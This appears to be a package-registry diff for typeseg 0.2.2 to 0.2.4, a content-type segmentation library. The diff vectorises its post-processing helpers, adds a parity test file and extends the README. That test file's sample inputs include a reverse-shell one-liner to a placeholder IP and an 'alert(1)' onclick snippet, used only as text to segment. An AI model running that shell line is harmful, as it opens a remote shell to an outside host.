typeseg 0.2.2__tar.gz → 0.2.4__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (33)
  1. {typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO +14 -1
  2. {typeseg-0.2.2 → typeseg-0.2.4}/README.md +13 -0
  3. {typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml +1 -1
  4. typeseg-0.2.4/tests/test_postprocess_parity.py +139 -0
  5. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py +53 -46
  6. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO +14 -1
  7. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt +1 -0
  8. {typeseg-0.2.2 → typeseg-0.2.4}/LICENSE +0 -0
  9. {typeseg-0.2.2 → typeseg-0.2.4}/setup.cfg +0 -0
  10. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_cupy_parity.py +0 -0
  11. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_distribution.py +0 -0
  12. {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_postprocess_perf.py +0 -0
  13. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__init__.py +0 -0
  14. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__main__.py +0 -0
  15. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cli.py +0 -0
  16. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_color.py +0 -0
  17. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cupy_backend.py +0 -0
  18. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_mamba_kernel.py +0 -0
  19. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_numpy_backend.py +0 -0
  20. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_onnx_backend.py +0 -0
  21. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_options.py +0 -0
  22. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_runtime.py +0 -0
  23. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_segmentation.py +0 -0
  24. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_tokenize.py +0 -0
  25. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.npz +0 -0
  26. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.onnx +0 -0
  27. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/manifest.json +0 -0
  28. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.npz +0 -0
  29. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.onnx +0 -0
  30. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/dependency_links.txt +0 -0
  31. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/entry_points.txt +0 -0
  32. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/requires.txt +0 -0
  33. {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: typeseg
3
- Version: 0.2.2
3
+ Version: 0.2.4
4
4
  Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
5
5
  Author: Martin Dallinger
6
6
  License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
249
249
  the interactive viewer also applies. The viewer has further heuristics
250
250
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
251
251
  `viewers/core.py` for those.
252
+
253
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
254
+ model's own forward pass — so the highest throughput is with post-processing off,
255
+ exposing the raw per-character argmax:
256
+
257
+ ```python
258
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
259
+ min_run_normalize=False, paired_delimiter_fill=False)
260
+ result = precise(text, raw)
261
+ ```
262
+
263
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
264
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
226
226
  the interactive viewer also applies. The viewer has further heuristics
227
227
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
228
228
  `viewers/core.py` for those.
229
+
230
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
231
+ model's own forward pass — so the highest throughput is with post-processing off,
232
+ exposing the raw per-character argmax:
233
+
234
+ ```python
235
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
236
+ min_run_normalize=False, paired_delimiter_fill=False)
237
+ result = precise(text, raw)
238
+ ```
239
+
240
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
241
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "typeseg"
7
- version = "0.2.2"
7
+ version = "0.2.4"
8
8
  description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
9
9
  readme = "README.md"
10
10
  license = "Apache-2.0"
@@ -0,0 +1,139 @@
1
+ """Regression guards for the vectorised post-processing helpers.
2
+
3
+ The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
4
+ ``build_segments``) were rewritten from per-character Python loops to vectorised
5
+ numpy. Each must stay bit-identical to a naive reference. We also run the full
6
+ pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
7
+ 1536-byte U-Net window (multi-window seams) and post-processing runs over long
8
+ sequences -- the regime where the optimisations matter.
9
+ """
10
+ import random
11
+
12
+ import numpy as np
13
+ import pytest
14
+
15
+ import typeseg
16
+ from typeseg import _postprocess as pp
17
+
18
+
19
+ # --- naive references (the pre-optimisation implementations) ---------------
20
+
21
+ def _runs_naive(labels):
22
+ runs = []
23
+ if not labels:
24
+ return runs
25
+ start = 0
26
+ for i in range(1, len(labels) + 1):
27
+ if i == len(labels) or labels[i] != labels[start]:
28
+ runs.append((start, i, labels[start]))
29
+ start = i
30
+ return runs
31
+
32
+
33
+ def _relabel_naive(text, labels):
34
+ n = len(text)
35
+ if n == 0:
36
+ return labels
37
+ is_ws = [c in pp._WHITESPACE for c in text]
38
+ if not any(is_ws):
39
+ return labels
40
+ left, right = [-1] * n, [-1] * n
41
+ last = -1
42
+ for i in range(n):
43
+ if not is_ws[i]:
44
+ last = labels[i]
45
+ left[i] = last
46
+ last = -1
47
+ for i in range(n - 1, -1, -1):
48
+ if not is_ws[i]:
49
+ last = labels[i]
50
+ right[i] = last
51
+ out = list(labels)
52
+ for i in range(n):
53
+ if is_ws[i]:
54
+ if left[i] != -1:
55
+ out[i] = left[i]
56
+ elif right[i] != -1:
57
+ out[i] = right[i]
58
+ return out
59
+
60
+
61
+ def _gate_naive(char_probs, labels, threshold, other_index):
62
+ if threshold <= 0.0 or char_probs.size == 0:
63
+ return labels
64
+ maxp = char_probs.max(axis=1)
65
+ return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
66
+
67
+
68
+ # --- helper parity ---------------------------------------------------------
69
+
70
+ def test_runs_matches_naive():
71
+ rng = random.Random(0)
72
+ for _ in range(500):
73
+ n = rng.randint(0, 300)
74
+ labels = [rng.randint(0, 4) for _ in range(n)]
75
+ assert pp._runs(labels) == _runs_naive(labels)
76
+
77
+
78
+ def test_relabel_whitespace_matches_naive():
79
+ rng = random.Random(1)
80
+ alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
81
+ for _ in range(2000):
82
+ n = rng.randint(0, 60)
83
+ alpha = rng.choice(alphabets)
84
+ text = "".join(rng.choice(alpha) for _ in range(n))
85
+ labels = [rng.randint(0, 6) for _ in range(n)]
86
+ assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
87
+
88
+
89
+ def test_confidence_gate_matches_naive():
90
+ rng = np.random.default_rng(2)
91
+ for _ in range(200):
92
+ n = int(rng.integers(0, 400))
93
+ cp = rng.random((n, 35)).astype(np.float32)
94
+ labels = [int(x) for x in rng.integers(0, 35, n)]
95
+ for thr in (0.0, 0.1, 0.3, 0.9):
96
+ got = pp.confidence_gate(cp, list(labels), thr, 35)
97
+ assert got == _gate_naive(cp, list(labels), thr, 35)
98
+ if thr > 0 and n > 0: # gated path returns Python ints (not numpy scalars)
99
+ assert all(isinstance(x, int) for x in got)
100
+
101
+
102
+ # --- full pipeline on looped samples (multi-window) ------------------------
103
+
104
+ SAMPLES = [
105
+ '.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
106
+ "UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
107
+ '{\n "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n "page": 1\n}',
108
+ "# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
109
+ "FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
110
+ ]
111
+
112
+
113
+ @pytest.mark.parametrize("k", [1, 4, 16])
114
+ @pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
115
+ def test_pipeline_consistent_on_looped_samples(fn, k):
116
+ for s in SAMPLES:
117
+ text = s * k
118
+ r = fn(text)
119
+ n = len(text)
120
+ # per-char arrays line up with the text length
121
+ assert len(r.char_labels) == n
122
+ assert len(r.char_confidence) == n
123
+ assert r.char_probs.shape == (n, len(r.labels))
124
+ # segments tile the whole text contiguously, no gaps/overlaps
125
+ assert r.segments[0].start == 0
126
+ assert r.segments[-1].end == n
127
+ for a, b in zip(r.segments, r.segments[1:]):
128
+ assert a.end == b.start
129
+ # each segment's label matches the per-char labels it covers
130
+ for seg in r.segments:
131
+ assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
132
+
133
+
134
+ def test_pipeline_deterministic_when_looped():
135
+ for fn in (typeseg.fast, typeseg.precise):
136
+ text = SAMPLES[0] * 8
137
+ a, b = fn(text), fn(text)
138
+ assert a.char_labels == b.char_labels
139
+ assert [s.label for s in a.segments] == [s.label for s in b.segments]
@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
17
17
 
18
18
 
19
19
  def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
20
- runs: List[Tuple[int, int, int]] = []
21
- if not labels:
22
- return runs
23
- start = 0
24
- for i in range(1, len(labels) + 1):
25
- if i == len(labels) or labels[i] != labels[start]:
26
- runs.append((start, i, labels[start]))
27
- start = i
28
- return runs
20
+ # Contiguous equal-label spans. Vectorised: the change points are where adjacent
21
+ # labels differ. This is called once per post-processing pass over the full
22
+ # sequence, so the pure-Python scan (with its per-iteration len()) dominated the
23
+ # pipeline; np.diff finds the boundaries in C. Output is identical.
24
+ n = len(labels)
25
+ if n == 0:
26
+ return []
27
+ arr = np.asarray(labels)
28
+ cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
29
+ starts = [0, *cuts.tolist()]
30
+ ends = [*cuts.tolist(), n]
31
+ return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
29
32
 
30
33
 
31
34
  def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
34
37
  n = len(text)
35
38
  if n == 0:
36
39
  return labels
37
- is_ws = [c in _WHITESPACE for c in text]
38
- if not any(is_ws):
40
+ ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
41
+ if not ws.any():
39
42
  return labels
40
- left = [-1] * n
41
- right = [-1] * n
42
- last = -1
43
- for i in range(n):
44
- if not is_ws[i]:
45
- last = labels[i]
46
- left[i] = last
47
- last = -1
48
- for i in range(n - 1, -1, -1):
49
- if not is_ws[i]:
50
- last = labels[i]
51
- right[i] = last
52
- out = list(labels)
53
- for i in range(n):
54
- if is_ws[i]:
55
- if left[i] != -1:
56
- out[i] = left[i]
57
- elif right[i] != -1:
58
- out[i] = right[i]
59
- return out
43
+ labels_arr = np.asarray(labels)
44
+ pos = np.arange(n)
45
+ # left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
46
+ # the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
47
+ # running min. A whitespace char takes its left host's label, else the right's.
48
+ left_src = np.maximum.accumulate(np.where(ws, -1, pos))
49
+ right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
50
+ src = np.where(left_src >= 0, left_src, right_src) # prefer left, fall back right
51
+ take = ws & (src < n) # leave ws with no host at all
52
+ out = labels_arr.copy()
53
+ out[take] = labels_arr[src[take]]
54
+ return out.tolist()
60
55
 
61
56
 
62
57
  def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
64
59
  if threshold <= 0.0 or char_probs.size == 0:
65
60
  return labels
66
61
  maxp = char_probs.max(axis=1)
67
- return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
62
+ return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
68
63
 
69
64
 
70
65
  def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
424
419
  if cur_score is None:
425
420
  cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
426
421
  best_start, best_end, best_score = cur_start, cur_end, cur_score
422
+ n_text = len(text)
427
423
  for ls in range(-max_shift, max_shift + 1):
428
424
  cs = cur_start + ls
429
425
  if cs < left_run[0] or cs >= cur_end:
430
426
  continue
427
+ # The wrap is valid only if text[cs-1] opens a pair; its required
428
+ # closing char is fixed by the left shift, so resolve it once here
429
+ # instead of calling _matching_wrap for every (ls, rs) combination.
430
+ close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
431
+ if close_needed is None:
432
+ continue
431
433
  for rs in range(-max_shift, max_shift + 1):
432
434
  ce = cur_end + rs
433
435
  if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
434
436
  continue
435
- if not _matching_wrap(text[cs - 1] if cs > 0 else "",
436
- text[ce] if ce < len(text) else ""):
437
+ if (text[ce] if ce < n_text else "") != close_needed:
437
438
  continue
438
439
  sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
439
440
  if sc is not None and sc > best_score + 1e-6:
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
452
453
  def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
453
454
  label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
454
455
  n = len(text)
455
- char_conf: List[float] = []
456
- char_label_names: List[str] = []
457
- for i in range(n):
458
- lab = labels[i]
459
- if char_probs.size:
460
- known_max = float(char_probs[i].max())
461
- conf = (1.0 - known_max) if lab == other_index else float(char_probs[i, lab])
462
- else:
463
- conf = 0.0
464
- char_conf.append(conf)
465
- char_label_names.append(other_label if lab == other_index else label_names[lab])
456
+ # Per-char confidence, vectorised. `other` (no probability column) scores
457
+ # 1 - max(known); every other label scores its own column. The old per-char
458
+ # `char_probs[i].max()` Python loop did n separate numpy reductions and was the
459
+ # bottleneck of the whole pipeline -- this is the same result in two reductions.
460
+ if char_probs.size:
461
+ lab_arr = np.asarray(labels, dtype=np.intp)
462
+ is_other = lab_arr == other_index
463
+ known_max = char_probs.max(axis=1) # (n,)
464
+ safe_lab = np.where(is_other, 0, lab_arr) # avoid OOB at other_index
465
+ picked = char_probs[np.arange(n), safe_lab] # (n,) chosen-label prob
466
+ conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
467
+ else:
468
+ conf_arr = np.zeros(n, dtype=np.float64)
469
+ char_conf: List[float] = conf_arr.tolist()
470
+ char_label_names: List[str] = [
471
+ other_label if lab == other_index else label_names[lab] for lab in labels
472
+ ]
466
473
 
467
474
  segments: List[Segment] = []
468
475
  for s, e, lab in _runs(labels):
469
476
  name = other_label if lab == other_index else label_names[lab]
470
- conf = float(np.mean(char_conf[s:e])) if e > s else 0.0
477
+ conf = float(conf_arr[s:e].mean()) if e > s else 0.0
471
478
  segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
472
479
  return segments, char_label_names, char_conf
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: typeseg
3
- Version: 0.2.2
3
+ Version: 0.2.4
4
4
  Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
5
5
  Author: Martin Dallinger
6
6
  License-Expression: Apache-2.0
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
249
249
  the interactive viewer also applies. The viewer has further heuristics
250
250
  (`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
251
251
  `viewers/core.py` for those.
252
+
253
+ These passes are cheap, but on long inputs they run on the CPU and can outweigh the
254
+ model's own forward pass — so the highest throughput is with post-processing off,
255
+ exposing the raw per-character argmax:
256
+
257
+ ```python
258
+ raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
259
+ min_run_normalize=False, paired_delimiter_fill=False)
260
+ result = precise(text, raw)
261
+ ```
262
+
263
+ The trade-off is noisier segments (single-character runs, frayed boundaries); the
264
+ default keeps post-processing on for cleaner, deployment-style output.
@@ -3,6 +3,7 @@ README.md
3
3
  pyproject.toml
4
4
  tests/test_cupy_parity.py
5
5
  tests/test_distribution.py
6
+ tests/test_postprocess_parity.py
6
7
  tests/test_postprocess_perf.py
7
8
  typeseg/__init__.py
8
9
  typeseg/__main__.py
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes
File without changes